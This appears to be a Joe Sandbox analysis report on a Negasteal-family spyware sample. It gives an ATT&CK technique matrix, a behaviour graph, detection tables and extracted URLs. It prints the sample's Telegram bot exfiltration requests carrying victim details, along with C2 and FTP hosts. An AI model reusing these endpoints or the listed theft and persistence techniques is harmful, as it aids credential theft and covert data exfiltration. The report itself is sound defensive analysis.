                    Source: Yara matchFile source: 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7552, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory13
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job
                    3
                    Obfuscated Files or Information
                    Security Account Manager1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    11
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS11
                    Security Software Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Process Discovery
                    SSHKeylogging3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials31
                    Virtualization/Sandbox Evasion
                    VNCGUI Input Capture24
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522669 Sample: 3140, EUR.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 3 other IPs or domains 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 15 other signatures 2->72 8 3140, EUR.exe 7 2->8         started        12 lkuPOyvaWlIu.exe 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 50->68 70 Uses the Telegram API (likely for C&C communication) 52->70 process4 file5 42 C:\Users\user\AppData\...\lkuPOyvaWlIu.exe, PE32 8->42 dropped 44 C:\Users\...\lkuPOyvaWlIu.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmpE737.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\3140, EUR.exe.log, CSV 8->48 dropped 74 Adds a directory exclusion to Windows Defender 8->74 76 Injects a PE file into a foreign processes 8->76 14 3140, EUR.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 24 lkuPOyvaWlIu.exe 12->24         started        26 schtasks.exe 12->26         started        28 lkuPOyvaWlIu.exe 12->28         started        30 lkuPOyvaWlIu.exe 12->30         started        signatures6 process7 dnsIp8 56 api.telegram.org 149.154.167.220, 443, 49768, 49777 TELEGRAMRU United Kingdom 14->56 58 quicklyserv.com 45.143.99.52, 21, 49772, 49778 EKSENBILISIMTR Turkey 14->58 60 2 other IPs or domains 14->60 82 Loading BitLocker PowerShell Module 18->82 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        84 Tries to steal Mail credentials (via file / registry access) 24->84 86 Tries to harvest and steal browser information (history, passwords, etc) 24->86 40 conhost.exe 26->40         started        signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    3140, EUR.exe47%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                    3140, EUR.exe44%VirustotalBrowse
                    3140, EUR.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe47%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                    C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe44%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    reallyfreegeoip.org0%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    quicklyserv.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://api.telegram.org1%VirustotalBrowse
                    http://quicklyserv.com0%VirustotalBrowse
                    https://api.telegram.org/bot2%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                    https://www.office.com/0%VirustotalBrowse
                    https://www.office.com/lB0%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a1%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=2%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    188.114.97.3
                    truetrueunknown
                    api.telegram.org
                    149.154.167.220
                    truetrueunknown
                    checkip.dyndns.com
                    132.226.8.169
                    truefalseunknown
                    quicklyserv.com
                    45.143.99.52
                    truetrueunknown
                    checkip.dyndns.org
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                      unknown
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      unknown
                      https://reallyfreegeoip.org/xml/8.46.123.33false
                      • URL Reputation: safe
                      unknown
                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fontbureau.com/designersG3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/?3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/bThe3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://api.telegram.org/bot3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                        http://www.fontbureau.com/designers?3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.office.com/lB3140, EUR.exe, 00000008.00000002.4122819893.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://www.tiro.com3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e173140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.goodfont.co.kr3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://chrome.google.com/webstore?hl=enlkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033C1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://varders.kozow.com:80813140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sajatypeworks.com3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.typography.netD3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/cThe3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htm3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://quicklyserv.com3140, EUR.exe, 00000008.00000002.4122819893.000000000319E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000338F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://checkip.dyndns.org/q3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://chrome.google.com/webstore?hl=enlB3140, EUR.exe, 00000008.00000002.4122819893.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033BC000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          http://www.galapagosdesign.com/DPlease3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fonts.com3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sandoll.co.kr3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.urwpp.deDPlease3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.zhongyicts.com.cn3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1802993888.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sakkal.com3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.office.com/lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033E3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.apache.org/licenses/LICENSE-2.03140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.fontbureau.com3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.org3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20163140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004292000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.carterandcone.coml3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://aborters.duckdns.org:80813140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          http://www.fontbureau.com/designers/cabarga.htmlN3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cn3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/frere-user.html3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?L3140, EUR.exe, 00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$3140, EUR.exe, 00000008.00000002.4122819893.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003279000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://anotherarmy.dns.army:80813140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            http://www.jiyu-kobo.co.jp/3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://reallyfreegeoip.org3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
